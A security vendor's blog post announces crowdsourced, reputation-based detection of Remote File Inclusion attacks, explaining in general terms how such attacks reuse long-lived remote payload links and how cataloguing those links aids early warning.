Shutting the Door on RFI Attacks with Crowdsourced Security

Today we’re introducing new detection methods to further improve our Remote File Inclusion (RFI) protective measures. These new features leverage the Incapsula crowdsourcing capabilities to help gain intelligence about RFI attack patterns, and provide an additional layer of protection for our clients’ websites.

To demonstrate these new security measures, and the way they augment the existing Incapsula RFI protection capabilities, let’s start off by providing some basic insights on motives and methodologies of RFI attacks.

A typical RFI attack relies on two factors: a scanner that detects and exploits the RFI vulnerability; and a RFI link, i.e., a remote location that delivers the malicious payload. In this two-factor equation, the scanner signature is often the variable, even more so when dealing with undocumented and zero-day threats. However, our data shows the RFI links to be a somewhat surprising ‘constant,’ which can be used to the white hat’s advantage.

Typical RFI Methodology

While reviewing over six months of accumulated RFI data, gathered across billions of sessions, we saw consistent correlations between different RFI attacks. Specifically, we noticed that — even when dealing with different attack vectors — the same RFI links were being re-used for multiple assaults on different targets. Moreover, we found that the lifespan for most of these links averages over 60 days, making them perfect tell-tale signs of a RFI attack and great candidates for long-term intelligence gathering.

Using these insights, together with native Incapsula crowdsourcing technology, we’ve developed a reputation-based system that aggregates session data from all websites on the Incapsula network to gather and catalogue large quantities of information about RFI links.

As a result, by monitoring activity across our network, as well as a multitude of already discovered remote payload locations, we’ve compiled a large library of locations — some compromised and some hacker-owned — which serve as centralized distribution points for malicious shell files.

For a security company such assets offer a wealth of benefits; this kind of information helps harden existing security rules and brings down the false-positive ratios. Most importantly, this information also serves as a backbone for an effective early warning system, allowing us to deal with the most extreme scenarios of absolutely unique zero-day threats that could bypass conventional security rules. Last but not least, this information also perfectly complements our existing Backdoor Protect capabilities, by supplying large quantities of shell signatures — straight from the source.

Zero Day RFI, Link Reputation for Early Warning

Keep your finger on the pulse

Sign up for updates from Imperva, our affiliated entities and industry news.